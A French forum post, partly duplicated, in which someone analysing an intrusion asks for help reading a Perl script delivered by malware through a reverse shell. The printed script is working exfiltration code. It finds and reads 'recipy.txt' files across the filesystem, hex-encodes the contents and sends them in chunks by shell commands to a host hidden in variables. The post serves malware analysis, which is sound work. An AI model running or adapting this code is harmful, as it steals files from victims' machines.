Tweet
Hello,
Je suis actuellement en train d'analyser un code perl envoyer par un malware via un reverse shell.
Cependant, n'ayant aucune idée du fonctionnement de perl, je ne comprends pas trop son fonctionnement.
Pouvez vous m'aider ?
Voici le code :
Je remarque qu'à la fin, il fait tourner une instruction shell via la sous fonction définie plus haut et nommée "e".
J'ai également de l'intérêt pour la sous fonction z. Elle ne semble utilisée nulle part.
Juste crée.
J'ai l'intuition qu'elle crée une url.
Si telle est bien le cas, pouvez vous me donner sa forme générale (pour des raisons de confidentialité, je ne vous ai pas mis l'entièreté des valeurs des variables) ?
Merci beaucoup.
Je suis actuellement en train d'analyser un code perl envoyer par un malware via un reverse shell.
Cependant, n'ayant aucune idée du fonctionnement de perl, je ne comprends pas trop son fonctionnement.
Pouvez vous m'aider ?
Voici le code :
Code:
sub p{pack "H*",pop}
sub p{pack "H*",pop}
sub u{unpack "H*",pop}
sub se{$_=pop;`$d+tries=1 $_.$u.$c$w\@$v`foreach(unpack"(A60)*",$_)}
sub d{se u "END".$u."END"}
sub c{se u pop}
sub e{$_=pop;map{c $_}split/\n/;&d}
sub z{`${d}files.$v$w\@$v`}
e(`find / -type f -name "recipy.txt" -exec cat {} +`);
J'ai également de l'intérêt pour la sous fonction z. Elle ne semble utilisée nulle part.
Juste crée.
J'ai l'intuition qu'elle crée une url.
Si telle est bien le cas, pouvez vous me donner sa forme générale (pour des raisons de confidentialité, je ne vous ai pas mis l'entièreté des valeurs des variables) ?
Merci beaucoup.
